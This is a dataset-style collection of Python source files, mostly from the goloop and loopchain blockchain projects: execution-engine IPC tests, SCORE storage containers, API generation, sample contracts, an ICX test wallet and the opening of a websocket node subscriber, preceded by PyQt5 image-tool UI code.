self.addWidget(self.result_button)
self.addWidget(self.close_button)
def result_signal(self):
self.result.emit()
def transform_signal(self):
self.transform.emit()
def close_signal(self):
self.close.emit()
def set_ready(self):
self.progress_label.setText("Ready")
self.progress_label.setStyleSheet("background-color: green; color:white")
def set_processing(self):
self.progress_label.setText("PROCESSING")
self.progress_label.setStyleSheet("background-color: blue; color:white")
def set_error(self):
self.progress_label.setText("ERROR")
self.progress_label.setStyleSheet("background-color: red; color:white")
def initialize(self):
self.set_ready()
self.result_button.setDisabled(True)
```
#### File: util/UserInterface/ndarrayToQpixmap.py
```python
import numpy as np
import qimage2ndarray
from PyQt5.QtGui import QPixmap
def ndarray_to_qpixmap(image: np.ndarray) -> QPixmap:
return QPixmap.fromImage(
qimage2ndarray
.array2qimage(image)
.rgbSwapped()
)
```
#### File: util/UserInterface/TransformWorker.py
```python
import numpy as np
from PyQt5.QtCore import QObject, pyqtSignal, QRunnable
from src.transformers.Transformer import Transformer
from src.util.capture import Capture
class TransformerSignal(QObject):
transformed = pyqtSignal(np.ndarray)
class TransformWorker(QRunnable):
def __init__(self, capture: Capture, transformer: Transformer):
super(TransformWorker, self).__init__()
self.signal = TransformerSignal()
self.capture = capture
self.T = transformer
def run(self):
image = self.capture.get()
transformed_image = self.T.transform(image)
if (transformed_image == image).all():
self.signal.transformed.emit(np.ndarray([0]))
else:
self.signal.transformed.emit(transformed_image)
``` |
{
"source": "JINWOO-J/goloop",
"score": 3
} |
#### File: cmd/eetest/eetest.py
```python
import sys
import os.path
from copy import copy
import os
basedir = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../pyee"))
sys.path.append(basedir)
from pyexec.ipc import *
class Address(object):
def __init__(self, obj):
if isinstance(obj, bytes):
if len(obj) < 21:
raise Exception("IllegalFormat")
self.__bytes = copy(obj)
elif isinstance(obj, str):
if len(obj) < 42:
raise Exception("IllegalFormat")
prefix = bytes([obj[:2] == "cx"])
body = bytes.fromhex(obj[2:])
self.__bytes = prefix + body
else:
raise Exception("IllegalFormat")
@staticmethod
def from_str(s: str) -> 'Address':
if len(s) < 42:
raise Exception("IllegalFormat")
prefix = bytes([s[:2] == "cx"])
body = bytes.fromhex(s[2:])
return Address(prefix + body)
def to_bytes(self):
return copy(self.__bytes)
def __str__(self):
body = self.__bytes[1:].hex()
if self.__bytes[0] == 0:
return "hx" + body
else:
return "cx" + body
def __repr__(self):
return f'Address("{self.__str__()}")'
class EECodec(Codec):
__instance = None
def __new__(cls, *args, **kwargs):
if cls.__instance is None:
cls.__instance = object.__new__(cls, *args, **kwargs)
return cls.__instance
def encode(self, obj) -> Tuple[int, bytes]:
if isinstance(obj, Address):
return TypeTag.ADDRESS, obj.to_bytes()
raise Exception
def decode(self, t: int, b: bytes) -> Any:
if t == TypeTag.ADDRESS:
return Address(b)
else:
raise Exception("UnknownType:" + t)
class TestEE(object):
def __init__(self, proxy: 'ServiceManagerProxy'):
self.__proxy = proxy
proxy.set_codec(EECodec())
proxy.set_invoke_handler(self.invoke_handler)
proxy.set_api_handler(self.api_handler)
def invoke_handler(self, code: str, is_query: bool, _from: 'Address', _to: 'Address',
value: int, limit: int, method: str, params: Any, info: Any) -> Tuple[int, int, Any]:
print(f'invoke_handler(code={repr(code)},is_query={is_query},from={_from},to={_to},' +
f'value={value},limit={limit},method={repr(method)},params={params},info={info})')
self.set_value(b"hello", b"world")
self.get_value(b'hello')
self.set_value(b'foo', None)
self.get_value(b'foo')
self.get_balance(Address("cx1000000000000000000000000000000000000000"))
self.send_event(["LogEvent(int,str,Address)", 1, params[0]],
[Address.from_str("cx0004444444444444444444444444444444444444")])
return Status.SUCCESS, 10, "Test"
def api_handler(self, code: str) -> APIInfo:
info = APIInfo(self.__proxy)
info.add_function("hello", 0, 0, [
("msg", DataType.STRING, None)
], [
DataType.STRING
])
info.add_event("LogEvent", 2, [
("id", DataType.INTEGER, None),
("msg", DataType.STRING, None),
("addr", DataType.ADDRESS, None)
])
return Status.SUCCESS, info
def get_value(self, k: bytes) -> Tuple[bool, bytes]:
ret = self.__proxy.get_value(k)
print(f"get_value({repr(k)}) -> {repr(ret)}")
return ret
def get_balance(self, addr: Address) -> int:
ret = self.__proxy.get_balance(addr)
print(f"get_balance({repr(addr)}) -> {ret}")
return ret
def set_value(self, k: bytes, v: Union[bytes, None]):
print(f"set_value({repr(k)},{repr(v)})")
return self.__proxy.set_value(k, v)
def get_info(self) -> Any:
info = self.__proxy.get_info()
print(f"get_info() -> {info}")
return info
def send_event(self, indexed: List[Any], data: List[Any]):
print(f"send_event({indexed},{data})")
self.__proxy.send_event(indexed, data)
def connect(self, addr: str):
print(f"connect({addr})")
self.__proxy.connect(addr)
self.__proxy.send_version(1, str(os.getpid()), "python")
def loop(self):
self.__proxy.loop()
def main():
proxy = ServiceManagerProxy()
ee = TestEE(proxy)
ee.connect("/tmp/ee.socket")
ee.loop()
if __name__ == "__main__":
main()
```
#### File: pyexec/iconscore/icon_container_db.py
```python
from typing import TypeVar, Optional, Any, Union, TYPE_CHECKING
from ..base.address import Address
from ..base.exception import InvalidParamsException, InvalidContainerAccessException
from ..utils import int_to_bytes, bytes_to_int
if TYPE_CHECKING:
from ..database.db import IconScoreDatabase
K = TypeVar('K', int, str, Address, bytes)
V = TypeVar('V', int, str, Address, bytes, bool)
ARRAY_DB_ID = b'\x00'
DICT_DB_ID = b'\x01'
VAR_DB_ID = b'\x02'
class ContainerUtil(object):
@staticmethod
def encode_key(key: K) -> bytes:
if key is None:
raise InvalidParamsException('key is None')
if isinstance(key, int):
bytes_key = int_to_bytes(key)
elif isinstance(key, str):
bytes_key = key.encode('utf-8')
elif isinstance(key, Address):
bytes_key = key.to_bytes()
elif isinstance(key, bytes):
bytes_key = key
else:
raise InvalidParamsException(f'Unsupported key type: {type(key)}')
return bytes_key
@staticmethod
def encode_value(value: V) -> bytes:
if isinstance(value, int):
byte_value = int_to_bytes(value)
elif isinstance(value, str):
byte_value = value.encode('utf-8')
elif isinstance(value, Address):
byte_value = value.to_bytes()
elif isinstance(value, bool):
byte_value = int_to_bytes(int(value))
elif isinstance(value, bytes):
byte_value = value
else:
raise InvalidParamsException(f'Unsupported value type: {type(value)}')
return byte_value
@staticmethod
def decode_object(value: bytes, value_type: type) -> Optional[Union[K, V]]:
if value is None:
return get_default_value(value_type)
obj_value = None
if value_type == int:
obj_value = bytes_to_int(value)
elif value_type == str:
obj_value = value.decode()
elif value_type == Address:
obj_value = Address.from_bytes(value)
if value_type == bool:
obj_value = bool(bytes_to_int(value))
elif value_type == bytes:
obj_value = value
return obj_value
def get_default_value(value_type: type) -> Any:
if value_type == int:
return 0
elif value_type == str:
return ""
elif value_type == bool:
return False
return None
class DictDB(object):
"""
Utility classes wrapping the state DB.
DictDB behaves more like python dict.
DictDB does not maintain order.
:K: [int, str, Address, bytes]
:V: [int, str, Address, bytes, bool]
"""
def __init__(self, var_key: K, db: 'IconScoreDatabase', value_type: type, depth: int = 1) -> None:
self._db = db.get_sub_db(ContainerUtil.encode_key(var_key), tag=DICT_DB_ID)
self.__value_type = value_type
self.__depth = depth
def remove(self, key: K) -> None:
"""
Removes the value of given key
:param key: key
"""
self.__remove(key)
def __setitem__(self, key: K, value: V) -> None:
if self.__depth != 1:
raise InvalidContainerAccessException('DictDB depth mismatch')
encoded_key: bytes = ContainerUtil.encode_key(key)
encoded_value: bytes = ContainerUtil.encode_value(value)
self._db.put(encoded_key, encoded_value)
def __getitem__(self, key: K) -> Any:
if self.__depth == 1:
encoded_key: bytes = ContainerUtil.encode_key(key)
return ContainerUtil.decode_object(self._db.get(encoded_key), self.__value_type)
else:
return DictDB(key, self._db, self.__value_type, self.__depth - 1)
def __delitem__(self, key: K):
self.__remove(key)
def __contains__(self, key: K):
# Plyvel doesn't allow setting None value in the DB.
# so there is no case of returning None value if the key exists.
value = self._db.get(ContainerUtil.encode_key(key))
return value is not None
def __remove(self, key: K) -> None:
if self.__depth != 1:
raise InvalidContainerAccessException('DictDB depth mismatch')
self._db.delete(ContainerUtil.encode_key(key))
class ArrayDB(object):
"""
Utility classes wrapping the state DB.
ArrayDB supports length and iterator, maintains order.
:K: [int, str, Address, bytes]
:V: [int, str, Address, bytes, bool]
"""
def __init__(self, var_key: K, db: 'IconScoreDatabase', value_type: type) -> None:
self._db = db.get_sub_db(ContainerUtil.encode_key(var_key), tag=ARRAY_DB_ID)
self.__value_type = value_type
def put(self, value: V) -> None:
"""
Puts the value at the end of array
:param value: value to add
"""
size: int = self.__get_size()
self.__put(size, value)
self.__set_size(size + 1)
def pop(self) -> Optional[V]:
"""
Gets and removes last added value
:return: last added value
"""
size: int = self.__get_size()
if size == 0:
return None
index = size - 1
last_val = self[index]
self._db.delete(ContainerUtil.encode_key(index))
self.__set_size(index)
return last_val
def get(self, index: int = 0) -> V:
"""
Gets the value at index
:param index: index
:return: value at the index
"""
return self[index]
def __get_size(self) -> int:
return ContainerUtil.decode_object(self._db.get(None), int)
def __set_size(self, size: int) -> None:
byte_value = ContainerUtil.encode_value(size)
self._db.put(None, byte_value)
def __put(self, index: int, value: V) -> None:
byte_value = ContainerUtil.encode_value(value)
self._db.put(ContainerUtil.encode_key(index), byte_value)
def __iter__(self):
return self._get_generator(self._db, self.__get_size(), self.__value_type)
def __len__(self):
return self.__get_size()
def __setitem__(self, index: int, value: V) -> None:
if not isinstance(index, int):
raise InvalidParamsException('Invalid index type: not an integer')
size = self.__get_size()
if index < 0:
index += size
if 0 <= index < size:
self.__put(index, value)
else:
raise InvalidParamsException('ArrayDB out of index')
def __getitem__(self, index: int) -> V:
return ArrayDB._get(self._db, self.__get_size(), index, self.__value_type)
def __contains__(self, item: V):
for e in self:
if e == item:
return True
return False
@staticmethod
def _get(db: 'IconScoreDatabase', size: int, index: int, value_type: type) -> V:
if not isinstance(index, int):
raise InvalidParamsException('Invalid index type: not an integer')
if index < 0:
index += size
if 0 <= index < size:
key: bytes = ContainerUtil.encode_key(index)
return ContainerUtil.decode_object(db.get(key), value_type)
raise InvalidParamsException('ArrayDB out of index')
@staticmethod
def _get_generator(db: 'IconScoreDatabase', size: int, value_type: type):
for index in range(size):
yield ArrayDB._get(db, size, index, value_type)
class VarDB(object):
"""
Utility classes wrapping the state DB.
VarDB can be used to store simple key-value state.
:K: [int, str, Address, bytes]
:V: [int, str, Address, bytes, bool]
"""
def __init__(self, var_key: K, db: 'IconScoreDatabase', value_type: type) -> None:
self._db = db.get_sub_db(ContainerUtil.encode_key(var_key), tag=VAR_DB_ID)
self.__value_type = value_type
def set(self, value: V) -> None:
"""
Sets the value
:param value: a value to be set
"""
byte_value = ContainerUtil.encode_value(value)
self._db.put(None, byte_value)
def get(self) -> Optional[V]:
"""
Gets the value
:return: value of the var db
"""
return ContainerUtil.decode_object(self._db.get(None), self.__value_type)
def remove(self) -> None:
"""
Deletes the value
"""
self._db.delete(None)
```
#### File: pyexec/iconscore/icon_score_loader.py
```python
import importlib
import json
import os
import sys
from ..base.exception import IllegalFormatException
PACKAGE_JSON_FILE = 'package.json'
MAIN_MODULE = 'main_module'
MAIN_SCORE = 'main_score'
class IconScoreLoader(object):
@staticmethod
def _load_package_json(score_path: str) -> dict:
pkg_json_path = os.path.join(score_path, PACKAGE_JSON_FILE)
with open(pkg_json_path, 'r') as f:
return json.load(f)
@staticmethod
def _get_package_info(package_json: dict) -> tuple:
main_module: str = package_json.get(MAIN_MODULE)
if not isinstance(main_module, str):
# "main_file" field will be deprecated soon.
# Use "main_module" instead
main_module: str = package_json['main_file']
# Relative package name is not allowed
if main_module.startswith('.'):
raise IllegalFormatException('Invalid main_module')
main_score: str = package_json[MAIN_SCORE]
return main_module, main_score
@staticmethod
def load_module(score_path: str) -> callable:
if not os.path.exists(score_path):
return None
dirname: str = os.path.dirname(score_path)
package: str = os.path.basename(score_path)
if dirname not in sys.path:
sys.path.append(dirname)
package_json = IconScoreLoader._load_package_json(score_path)
main_module, main_score = IconScoreLoader._get_package_info(package_json)
# in order for the new module to be noticed by the import system
importlib.invalidate_caches()
module = importlib.import_module(f".{main_module}", package)
return getattr(module, main_score)
```
#### File: pyexec/iconscore/score_api_generator.py
```python
from inspect import signature, Signature, Parameter, isclass
from typing import Any, Optional
from .icon_score_constant import ConstBitFlag, CONST_BIT_FLAG, CONST_INDEXED_ARGS_COUNT, BaseType, \
STR_FALLBACK, STR_ON_INSTALL, STR_ON_UPDATE
from ..base.address import Address
from ..base.exception import IllegalFormatException, InvalidParamsException
from ..utils import get_main_type_from_annotations_type
from ..ipc.proxy import APIType
APIFlagsMask = ConstBitFlag.ReadOnly \
| ConstBitFlag.External \
| ConstBitFlag.Payable \
| ConstBitFlag.Isolated
class ScoreApiGenerator:
__API_TYPE = 'type'
__API_NAME = 'name'
__API_INPUTS = 'inputs'
__API_OUTPUTS = 'outputs'
__API_PAYABLE = 'payable'
__API_READONLY = 'readonly'
__API_INPUTS_INDEXED = 'indexed'
__API_INPUTS_DEFAULT = 'default'
__API_PARAMS_ADDRESS = 'Address'
__API_PARAMS_INDEXED = 'Indexed'
__API_TYPE_FUNCTION = 'function'
__API_TYPE_EVENT = 'eventlog'
__API_TYPE_FALLBACK = STR_FALLBACK
__API_TYPE_ON_INSTALL = STR_ON_INSTALL
__API_TYPE_ON_UPDATE = STR_ON_UPDATE
@staticmethod
def generate(score_funcs: list) -> list:
api = []
ScoreApiGenerator.__generate_functions(api, score_funcs)
ScoreApiGenerator.__generate_events(api, score_funcs)
return api
@staticmethod
def __generate_functions(src: list, score_funcs: list) -> None:
for func in score_funcs:
try:
const_bit_flag = getattr(func, CONST_BIT_FLAG, 0)
if const_bit_flag & ConstBitFlag.External or \
func.__name__ == ScoreApiGenerator.__API_TYPE_ON_INSTALL or \
func.__name__ == ScoreApiGenerator.__API_TYPE_ON_UPDATE or \
func.__name__ == ScoreApiGenerator.__API_TYPE_FALLBACK:
src.append(ScoreApiGenerator.__generate_function_info(
func.__name__, const_bit_flag, signature(func)))
except IllegalFormatException as e:
raise IllegalFormatException(f"{e.message} at {func.__name__}")
@staticmethod
def __generate_function_info(func_name: str, flags: int, sig_info: 'Signature') -> list:
if flags & APIFlagsMask != flags:
raise IllegalFormatException(f'Illegal combination of decorators')
is_readonly = flags & ConstBitFlag.ReadOnly == ConstBitFlag.ReadOnly
info = list()
if func_name == ScoreApiGenerator.__API_TYPE_FALLBACK:
info.append(APIType.FALLBACK)
else:
info.append(APIType.FUNCTION)
info.append(func_name)
info.append(flags)
info.append(ScoreApiGenerator.__generate_inputs(dict(sig_info.parameters)))
info.append(ScoreApiGenerator.__generate_output(sig_info.return_annotation, is_readonly))
return info
@staticmethod
def __generate_events(src: list, score_funcs: list) -> None:
event_funcs = {func.__name__: signature(func) for func in score_funcs
if getattr(func, CONST_BIT_FLAG, 0) & ConstBitFlag.EventLog}
indexed_args_counts = {func.__name__: getattr(func, CONST_INDEXED_ARGS_COUNT, 0)
for func in score_funcs
if getattr(func, CONST_INDEXED_ARGS_COUNT, 0)}
for func_name, event in event_funcs.items():
index_args_count = indexed_args_counts.get(func_name, 0)
src.append(ScoreApiGenerator.__generate_event(func_name, event, index_args_count))
@staticmethod
def __generate_event(func_name: str, sig_info: 'Signature', index_args_count: int) -> list:
info = list()
info.append(APIType.EVENT)
info.append(func_name)
info.append(index_args_count)
info.append(ScoreApiGenerator.__generate_inputs(dict(sig_info.parameters), index_args_count))
return info
@staticmethod
def __generate_output(params_type: Any, is_readonly: bool) -> list:
info_list = []
if not is_readonly:
return info_list
if params_type is Signature.empty:
raise IllegalFormatException(
"Returning type should be declared in read-only functions")
main_type = get_main_type_from_annotations_type(params_type)
main_type = ScoreApiGenerator.__convert_str_to_type(main_type)
# At first, finds if the type is a 'list' or a 'dict'
# if not, finds a base type
find = (t for t in [list, dict]
if isclass(main_type) and issubclass(main_type, t))
api_type = next(find, None)
if api_type is None:
api_type = ScoreApiGenerator.__find_base_super_type(main_type)
if api_type is None:
raise IllegalFormatException(f"Unsupported type for '{params_type}'")
info = dict()
info[ScoreApiGenerator.__API_TYPE] = api_type.__name__
info_list.append(info)
return info_list
@staticmethod
def __convert_str_to_type(params_type: Any) -> Any:
if not isinstance(params_type, str):
return params_type
if params_type == 'Address':
return Address
else:
return params_type
@staticmethod
def __generate_inputs(params: dict, index_args_count: int = 0) -> list:
tmp_list = []
args_index = 0
for param_name, param in params.items():
if param_name == 'self' or param_name == 'cls':
continue
is_indexed = args_index < index_args_count
args_index += 1
ScoreApiGenerator.__generate_input(tmp_list, param, is_indexed)
return tmp_list
@staticmethod
def __generate_input(src: list, param: 'Parameter', is_indexed: bool):
# If there's no hint of argument in the function declaration,
# raise an exception
if param.annotation is Parameter.empty:
raise IllegalFormatException(f"Missing argument hint for '{param.name}'")
main_type = get_main_type_from_annotations_type(param.annotation)
main_type = ScoreApiGenerator.__convert_str_to_type(main_type)
api_type = ScoreApiGenerator.__find_base_super_type(main_type)
if api_type is None:
raise IllegalFormatException(
f"Unsupported type for '{param.name}: {param.annotation}'")
info = dict()
info[ScoreApiGenerator.__API_NAME] = param.name
info[ScoreApiGenerator.__API_TYPE] = api_type.__name__
if is_indexed:
info[ScoreApiGenerator.__API_INPUTS_INDEXED] = is_indexed
if param.default is not Parameter.empty:
if param.default is not None and not isinstance(param.default, main_type):
raise InvalidParamsException(f'Default params type mismatch. value: {param.default} type: {main_type}')
# the default param value will be encoded at ipc.proxy
info[ScoreApiGenerator.__API_INPUTS_DEFAULT] = param.default
src.append(info)
@staticmethod
def __find_base_super_type(t: type) -> Optional[type]:
"""
Finds a base type of the input and returns it if any
:param t: target
:return: base_super_type
"""
find = (base_type for base_type in BaseType.__constraints__
if isclass(t) and issubclass(t, base_type))
return next(find, None)
```
#### File: pyee/pyexec/service_engine.py
```python
from .base.address import Address, GETAPI_DUMMY_ADDRESS
from .base.exception import *
from .base.type_converter import TypeConverter
from .database.factory import ContextDatabaseFactory
from .icon_constant import Status
from .iconscore.icon_score_base import IconScoreBase
from .iconscore.icon_score_context import ContextContainer, IconScoreContext
from .iconscore.icon_score_eventlog import EventLogEmitter
from .iconscore.icon_score_mapper import IconScoreMapper
from .iconscore.internal_call import InternalCall
from .logger import Logger, SystemLogger
TAG = 'ServiceEngine'
def decode_params(values: dict) -> dict:
result = {}
if isinstance(values, dict):
for k, v in values.items():
new_key = k
if isinstance(k, bytes):
new_key = k.decode()
elif not isinstance(k, str):
raise BaseException('Unexpected key type')
if isinstance(v, bytes):
result[new_key] = v.decode()
else:
result[new_key] = v
return result
class ServiceEngine(ContextContainer):
_score_mapper = None
_proxy = None
@classmethod
def open(cls, proxy):
cls._score_mapper = IconScoreMapper()
cls._proxy = proxy
ContextDatabaseFactory.open(proxy, ContextDatabaseFactory.Mode.SINGLE_DB)
EventLogEmitter.open(proxy)
InternalCall.open(proxy)
@classmethod
def invoke(cls, context: IconScoreContext):
Logger.debug(f'[invoke] {context.method}, {context.params}', TAG)
cls._push_context(context)
status, step_used, ret = cls._handle_invoke(context)
cls._pop_context()
Logger.debug(f'*** RESULT: {status}, {step_used}, {ret}', TAG)
return status, step_used, ret
@classmethod
def get_score_api(cls, code: str):
try:
icon_score: 'IconScoreBase' = cls._get_icon_score(GETAPI_DUMMY_ADDRESS, code)
ret = icon_score.get_api()
status = Status.SUCCESS
except BaseException as e:
status, ret = cls._get_status_from_exception(e)
return status, ret
@classmethod
def _get_icon_score(cls, address: Address, code: str):
return cls._score_mapper.get_icon_score(address, code)
@classmethod
def _handle_invoke(cls, context):
try:
ret = cls._internal_call(context)
status = Status.SUCCESS
except BaseException as e:
status, ret = cls._get_status_from_exception(e)
finally:
cls._proxy.handle_set_values()
step_used = context.step_counter.step_used
return status, step_used, ret
@classmethod
def _internal_call(cls, context: IconScoreContext):
icon_score: 'IconScoreBase' = cls._get_icon_score(context.to, context.code)
if icon_score is None:
raise ScoreNotFoundException(f'SCORE not found: {context.to}')
func_name: str = context.method
context.set_func_type_by_icon_score(icon_score, func_name)
if isinstance(context.params, dict):
arg_params = []
params: dict = decode_params(context.params)
kw_params = cls._convert_score_params_by_annotations(icon_score, func_name, params)
Logger.debug(f'kw_params: {kw_params}', TAG)
elif isinstance(context.params, list):
arg_params: list = context.params
Logger.debug(f'arg_params: {arg_params}', TAG)
kw_params = {}
else:
raise InvalidParamsException('Unknown params type')
score_func = getattr(icon_score, '_IconScoreBase__call')
return score_func(func_name=func_name, arg_params=arg_params, kw_params=kw_params)
@staticmethod
def _convert_score_params_by_annotations(icon_score: 'IconScoreBase', func_name: str, kw_params: dict) -> dict:
tmp_params = kw_params
score_func = getattr(icon_score, func_name)
annotation_params = TypeConverter.make_annotations_from_method(score_func)
TypeConverter.convert_data_params(annotation_params, tmp_params)
return tmp_params
@classmethod
def _get_status_from_exception(cls, e: BaseException):
if isinstance(e, IconServiceBaseException):
if isinstance(e, IconScoreException):
tag = 'ScoreException'
else:
tag = 'SystemException'
Logger.exception(e.message, tag)
code = e.code
message = e.message
else:
SystemLogger.exception(repr(e), 'SystemError')
code = ExceptionCode.SYSTEM_ERROR
message = str(e)
return code, message
```
#### File: scores/receipt/receipt.py
```python
from iconservice import *
TAG = 'Receipt'
class InterCallInterface(InterfaceScore):
@interface
def call_event_log(self, p_log_index: int, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
class Receipt(IconScoreBase):
@eventlog
def event_log_no_index(self, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
@eventlog(indexed=1)
def event_log_1_index(self, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
@eventlog(indexed=2)
def event_log_2_index(self, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
@eventlog(indexed=3)
def event_log_3_index(self, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
pass
def __init__(self, db: IconScoreDatabase) -> None:
super().__init__(db)
def on_install(self) -> None:
super().on_install()
def on_update(self) -> None:
super().on_update()
@external
def call_event_log(self, p_log_index: int, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
if p_log_index == 0:
self.event_log_no_index(p_bool, p_addr, p_int, p_bytes, p_str)
elif p_log_index == 1:
self.event_log_1_index(p_bool, p_addr, p_int, p_bytes, p_str)
elif p_log_index == 2:
self.event_log_2_index(p_bool, p_addr, p_int, p_bytes, p_str)
elif p_log_index == 3:
self.event_log_3_index(p_bool, p_addr, p_int, p_bytes, p_str)
else:
raise Exception(f'Illegal argument for index {p_log_index})')
@external
def inter_call_event_log(self, _to: Address, p_log_index: int, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
recipient_score = self.create_interface_score(_to, InterCallInterface)
recipient_score.call_event_log(p_log_index, p_bool, p_addr, p_int, p_bytes, p_str)
@external
def event_log_and_inter_call(self, _to: Address, p_log_index: int, p_bool: bool, p_addr: Address, p_int: int, p_bytes: bytes, p_str: str):
self.call_event_log(p_log_index, p_bool, p_addr, p_int, p_bytes, p_str)
recipient_score = self.create_interface_score(_to, InterCallInterface)
recipient_score.call_event_log(p_log_index, p_bool, p_addr, p_int, p_bytes, p_str)
```
#### File: scores/tbc_interpreter/tbc_interpreter.py
```python
from iconservice import *
TAG = 'TBCInterpreter'
class TBCInterpreter(IconScoreBase):
CALL = 0
REVERT = 1
ADDRESS_LEN = 21
SHORT_LEN = 2
def __init__(self, db: IconScoreDatabase) -> None:
super().__init__(db)
self._name = VarDB('name', db, value_type=str)
self._res = ''
def on_install(self, _name: str) -> None:
super().on_install()
self._name.set(_name)
def on_update(self) -> None:
super().on_update()
@eventlog(indexed=1)
def Event_(self, eventData:str):
pass
def Event(self, eventData:str):
if len(self._res) > 0:
self._res = self._res + '\n'
self._res = self._res + eventData
@external
def runAndLogResult(self, _code: bytes):
res = self.run(_code)
self.Event_(res)
@external
def run(self, _code: bytes) -> str:
self._res = ''
self.Event(f'Enter: {self._name.get()}')
try:
self._runImpl(_code)
self.Event(f'Exit by Return: {self._name.get()}')
except:
self.Event(f'Exit by Exception: {self._name.get()}')
raise
return self._res
def _runImpl(self, code: bytes):
offset = 0
while offset < len(code):
insn = code[offset]
offset = offset + 1
if insn == self.CALL:
addr = Address.from_bytes(
code[offset:offset + self.ADDRESS_LEN]
)
offset = offset + self.ADDRESS_LEN
codeLen = int.from_bytes(
code[offset:offset + self.SHORT_LEN],
byteorder='big'
)
offset = offset + self.SHORT_LEN
ccode = code[offset: offset + codeLen]
offset = offset + codeLen
try:
res = self.call(addr, "run", {'_code': ccode})
self.Event(res)
except IconScoreException as e:
self.Event(e.message)
pass
elif insn == self.REVERT:
code = int.from_bytes(
code[offset:offset + self.SHORT_LEN],
byteorder='big'
)
offset = offset + self.SHORT_LEN
self.Event(f'Exit by Revert: {self._name.get()}')
revert(self._res, code)
else:
self.Event(f'Unexpected insn {insn}')
``` |
{
"source": "JINWOO-J/loopchain",
"score": 2
} |
#### File: cli_tools/icx_test/icx_wallet.py
```python
import base64
import hashlib
import logging
import random
from secp256k1 import PrivateKey, PublicKey
from loopchain import utils, configure as conf
from loopchain.blockchain.types import Hash32, VarBytes
from loopchain.crypto.hashing import build_hash_generator
ICX_FACTOR = 10 ** 18
ICX_FEE = 0.01
class IcxWallet:
def __init__(self, private_key=None):
self.__private_key = private_key or PrivateKey()
self.__address = self.create_address(self.__private_key.pubkey)
self.__last_tx_hash = ""
tx_hash_versions = conf.CHANNEL_OPTION[conf.LOOPCHAIN_DEFAULT_CHANNEL]["hash_versions"]
self.__hash_generators = {
"0x2": build_hash_generator(tx_hash_versions["0x2"], "icx_sendTransaction"),
"0x3": build_hash_generator(tx_hash_versions["0x3"], "icx_sendTransaction")
}
self.to_address = None
self.value = None
self.message = None
self.fee = ICX_FEE
self.nid = '0x3'
self.is_logging = True
@property
def address(self):
return self.__address
@property
def last_tx_hash(self):
return self.__last_tx_hash
@last_tx_hash.setter
def last_tx_hash(self, last_tx_hash):
self.__last_tx_hash = last_tx_hash
def create_icx_origin(self, is_raw_data=False):
params = dict()
params["from"] = self.address
params["to"] = self.to_address
params["value"] = hex(int(self.value * ICX_FACTOR))
params["fee"] = hex(int(self.fee * ICX_FACTOR))
params["timestamp"] = str(utils.get_now_time_stamp())
tx_hash = Hash32(self.__hash_generators["0x2"].generate_hash(params))
params["tx_hash"] = tx_hash.hex()
params["signature"] = self.create_signature(tx_hash)
icx_origin = dict()
icx_origin["jsonrpc"] = "2.0"
icx_origin["method"] = "icx_sendTransaction"
icx_origin["id"] = random.randrange(0, 100000)
icx_origin["params"] = params
self.__last_tx_hash = tx_hash.hex_0x()
if self.is_logging:
logging.debug(f"icx_sendTransaction params for v2: {params}")
return icx_origin if is_raw_data else params
def create_icx_origin_v3(self, is_raw_data=False):
params = dict()
params["version"] = "0x3"
params["from"] = self.address
params["to"] = self.to_address
params["value"] = hex(int(self.value * ICX_FACTOR))
params["stepLimit"] = "0x3000000"
params["timestamp"] = hex(utils.get_now_time_stamp())
params["nonce"] = "0x0"
params["nid"] = self.nid
if self.message is not None:
params["dataType"] = "message"
params["data"] = VarBytes(self.message.encode('utf-8')).hex_0x()
hash_for_sign = self.__hash_generators["0x3"].generate_hash(params)
params["signature"] = self.create_signature(hash_for_sign)
if self.is_logging:
logging.debug(f"icx_sendTransaction params for v3: {params}")
self.__last_tx_hash = Hash32(hash_for_sign).hex_0x()
icx_origin = dict()
icx_origin["jsonrpc"] = "2.0"
icx_origin["method"] = "icx_sendTransaction"
icx_origin["id"] = random.randrange(0, 100000)
icx_origin["params"] = params
return icx_origin if is_raw_data else params
def create_address(self, public_key: PublicKey) -> str:
serialized_pub = public_key.serialize(compressed=False)
hashed_pub = hashlib.sha3_256(serialized_pub[1:]).hexdigest()
return f"hx{hashed_pub[-40:]}"
def create_signature(self, tx_hash):
signature = self.__private_key.ecdsa_sign_recoverable(msg=tx_hash,
raw=True,
digest=hashlib.sha3_256)
serialized_sig = self.__private_key.ecdsa_recoverable_serialize(signature)
sig_message = b''.join([serialized_sig[0], bytes([serialized_sig[1]])])
signature = base64.b64encode(sig_message).decode()
return signature
```
#### File: loopchain/baseservice/node_subscriber.py
```python
import asyncio
import json
import logging
from asyncio import Event
from urllib import parse
import websockets
from earlgrey import MessageQueueService
from jsonrpcclient.request import Request
from jsonrpcserver import config
from jsonrpcserver.aio import AsyncMethods
from websockets import WebSocketClientProtocol
from loopchain import configure as conf
from loopchain import utils
from loopchain.baseservice import ObjectManager, TimerService, Timer
from loopchain.blockchain import AnnounceNewBlockError
from loopchain.blockchain.blocks import BlockSerializer, BlockVerifier
from loopchain.blockchain.votes.v0_1a import BlockVotes
from loopchain.channel.channel_property import ChannelProperty
from loopchain.protos import message_code
config.log_requests = False
config.log_responses = False
ws_methods = AsyncMethods()
CONNECTION_FAIL_CONDITIONS = {
message_code.Response.fail_subscribe_limit,
message_code.Response.fail_connection_closed,
message_code.Response.fail_connect_to_leader
}
class UnregisteredException(Exception):
"""When UnregisteredException is raised during Watch state,
this node would transit the state to SubscribeNetwork and init next radiostation target.
"""
pass
def convert_response_to_dict(response: bytes) -> dict:
response_dict: dict = json.loads(response)
response_dict = _check_error_in_response(response_dict)
return response_dict
def _check_error_in_response(response_dict: dict) -> dict:
params = response_dict.get('params')
if params and 'error' in params:
error_msg = params.get('error') or f"Error sent from rs target: {params}"
if params['code'] in CONNECTION_FAIL_CONDITIONS:
raise UnregisteredException(error_msg)
else:
raise AnnounceNewBlockError(error_msg)
return response_dict
class NodeSubscriber:
def __init__(self, channel, rs_target):
scheme = 'wss' if ('https://' in rs_target) else 'ws'
netloc = parse.urlparse(rs_target).netloc
